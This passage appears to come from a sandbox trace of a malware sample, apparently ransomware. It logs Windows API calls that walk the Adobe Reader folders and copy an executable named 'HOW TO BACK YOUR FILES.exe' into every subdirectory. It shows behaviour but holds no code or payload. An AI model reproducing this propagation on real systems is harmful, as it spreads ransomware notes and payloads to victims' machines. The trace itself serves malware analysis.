10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.218] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.218] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cd96c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cd96c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.219] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.219] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.219] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT" [0059.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d36d8 | out: hHeap=0x2b0000) returned 1 [0059.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0059.219] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT") returned 79 [0059.219] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT" [0059.219] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.219] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.225] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.225] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cd96c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cd96c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.225] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.226] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.226] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS" [0059.226] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0059.226] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0059.226] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS") returned 79 [0059.226] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS" [0059.226] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.226] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.232] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.232] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cff820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cff820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.233] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.233] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.233] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT" [0059.233] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.233] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0059.233] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT") returned 79 [0059.233] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT" [0059.233] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.233] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.240] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.240] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81eb2980, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cff820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cff820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.240] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.240] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.240] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm" [0059.240] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0059.240] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0059.240] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm") returned 65 [0059.240] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm" [0059.240] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.240] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.245] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.245] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e05720, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cff820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cff820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.246] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.246] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.246] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP" [0059.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0059.246] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP") returned 69 [0059.246] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP" [0059.246] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.246] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.252] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.252] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e519e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54d25980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54d25980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.253] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.253] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.253] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale" [0059.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0059.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0059.253] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale") returned 54 [0059.253] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale" [0059.253] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.253] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.259] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.259] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54d25980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54d25980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.259] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.259] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.260] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW" [0059.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0d98 | out: hHeap=0x2b0000) returned 1 [0059.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2660 | out: hHeap=0x2b0000) returned 1 [0059.260] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW") returned 60 [0059.260] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW" [0059.260] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.260] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.275] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.275] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54d4bae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54d4bae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.276] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.276] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.276] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services" [0059.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2660 | out: hHeap=0x2b0000) returned 1 [0059.276] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services") returned 69 [0059.276] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services" [0059.276] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.276] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.285] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.285] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f24da0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54d71c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54d71c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.285] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.285] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.285] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN" [0059.285] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0d10 | out: hHeap=0x2b0000) returned 1 [0059.285] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0059.286] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN") returned 60 [0059.286] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN" [0059.286] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.286] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.292] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.292] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d6d7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54d71c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54d71c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.293] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.293] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.293] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services" [0059.293] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.293] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0059.293] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services") returned 69 [0059.293] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services" [0059.293] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.293] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.299] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.299] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54d97da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54d97da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.299] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.299] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.299] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 